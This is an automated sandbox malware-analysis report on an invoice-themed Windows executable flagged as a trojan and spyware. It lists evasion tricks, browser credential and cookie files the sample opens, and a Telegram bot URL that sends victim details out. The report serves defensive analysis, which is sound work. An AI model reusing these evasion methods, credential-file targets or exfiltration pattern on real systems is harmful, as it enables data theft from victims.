          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Factura Honorarios 2024-11-17.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          Source: Yara matchFile source: 00000000.00000002.1873262256.0000000006B16000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_6FF41B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FF41B63
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_6FF42FD0 push eax; ret 0_2_6FF42FFE
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_3_0019CA98 pushfd ; retf 0019h3_3_0019CA99
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_3_0019EE18 push eax; iretd 3_3_0019EE65
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_3_0019EE8C push eax; iretd 3_3_0019EEA9
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_3_0019CF4C push eax; iretd 3_3_0019CF4D
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_00159C30 push esp; retf 0017h3_2_00159D55
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeFile created: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeAPI/Special instruction interceptor: Address: 70A64CD
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeAPI/Special instruction interceptor: Address: 3C164CD
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeRDTSC instruction interceptor: First address: 7069CA9 second address: 7069CA9 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F682CC511A3h 0x00000006 test cx, dx 0x00000009 inc ebp 0x0000000a test cl, dl 0x0000000c inc ebx 0x0000000d cmp al, cl 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeRDTSC instruction interceptor: First address: 3BD9CA9 second address: 3BD9CA9 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F682C69C2F3h 0x00000006 test cx, dx 0x00000009 inc ebp 0x0000000a test cl, dl 0x0000000c inc ebx 0x0000000d cmp al, cl 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeMemory allocated: 35F50000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeMemory allocated: 35CD0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599890Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599672Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599562Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599453Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599343Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599234Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599125Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 599015Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598906Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598797Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598687Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598578Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598469Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598359Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598250Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598140Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 598031Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597922Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597812Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597703Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597590Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597437Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597288Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597187Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 597078Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596968Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596859Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596750Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596640Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596531Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596422Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596312Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596203Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 596093Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595984Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595873Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595765Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595656Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595547Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595437Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595328Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595219Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 595094Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 594984Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 594875Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 594765Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 594656Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeThread delayed: delay time: 594546Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeWindow / User API: threadDelayed 8178Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeWindow / User API: threadDelayed 1677Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeAPI coverage: 1.7 %
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep count: 35 > 30Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -32281802128991695s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -599890s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8124Thread sleep count: 8178 > 30Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8124Thread sleep count: 1677 > 30Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -599781s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -599672s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -599562s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -599453s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -599343s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -599234s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -599125s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -599015s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -598906s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -598797s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -598687s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -598578s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -598469s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -598359s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -598250s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -598140s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -598031s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -597922s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -597812s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -597703s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -597590s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -597437s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -597288s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe TID: 8120Thread sleep time: -597187s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe Code function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe Code function: 0_2_00402868 FindFirstFileW,0_2_00402868
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe Code function: 3_2_00402868 FindFirstFileW,3_2_00402868
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe Code function: 3_2_004065C7 FindFirstFileW,FindClose,3_2_004065C7
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe Code function: 3_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405996
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe API call chain: ExitProcess graph end node graph_0-4911
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe API call chain: ExitProcess graph end node graph_0-4906
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe Code function: 0_2_6FF41B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FF41B63
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe Memory allocated: page read and write | page guard
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe Process created: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe Queries volume information: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe VolumeInformation
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match File source: 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: Factura Honorarios 2024-11-17.exe PID: 7628, type: MEMORYSTR
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: Yara match File source: Process Memory Space: Factura Honorarios 2024-11-17.exe PID: 7628, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match File source: 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: Factura Honorarios 2024-11-17.exe PID: 7628, type: MEMORYSTR

          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
          Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 215 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 11 Process Injection | 3 Obfuscated Files or Information | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 21 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 21 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

          Source | Detection | Scanner | Label | Link
          Factura Honorarios 2024-11-17.exe | 32% | ReversingLabs | Win32.Trojan.Generic |

          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll | 3% | ReversingLabs | |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.250.185.174 | true | false | | high
drive.usercontent.google.com | 172.217.16.193 | true | false | | high
reallyfreegeoip.org | 188.114.97.3 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 193.122.6.168 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org/ | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2019/11/2024%20/%2002:39:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
https://reallyfreegeoip.org/xml/155.94.241.187 | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | | 62041 | TELEGRAMRU | false
142.250.185.174 | drive.google.com | United States | | 15169 | GOOGLEUS | false
188.114.97.3 | reallyfreegeoip.org | European Union | | 13335 | CLOUDFLARENETUS | false
193.122.6.168 | checkip.dyndns.com | United States | | 31898 | ORACLE-BMC-31898US | false
172.217.16.193 | drive.usercontent.google.com | United States | | 15169 | GOOGLEUS | false
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1557624
                                                                                        Start date and time:2024-11-18 13:48:37 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 7m 39s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:8
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:Factura Honorarios 2024-11-17.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@3/6@5/5
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 97%
                                                                                        • Number of executed functions: 180
                                                                                        • Number of non-executed functions: 145
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: Factura Honorarios 2024-11-17.exe
Time | Type | Description
07:50:58 | API Interceptor | 1155x Sleep call for process: Factura Honorarios 2024-11-17.exe modified
                                                                                                            • 158.101.44.242
                                                                                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            RE Invoice Request (Nov 2024).exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            Solicitud de cotizacion Stro1268975.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            Revised invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 158.101.44.242
                                                                                                            rFACTURASALBARANESPENDIENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            TELEGRAMRUDHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 149.154.167.220
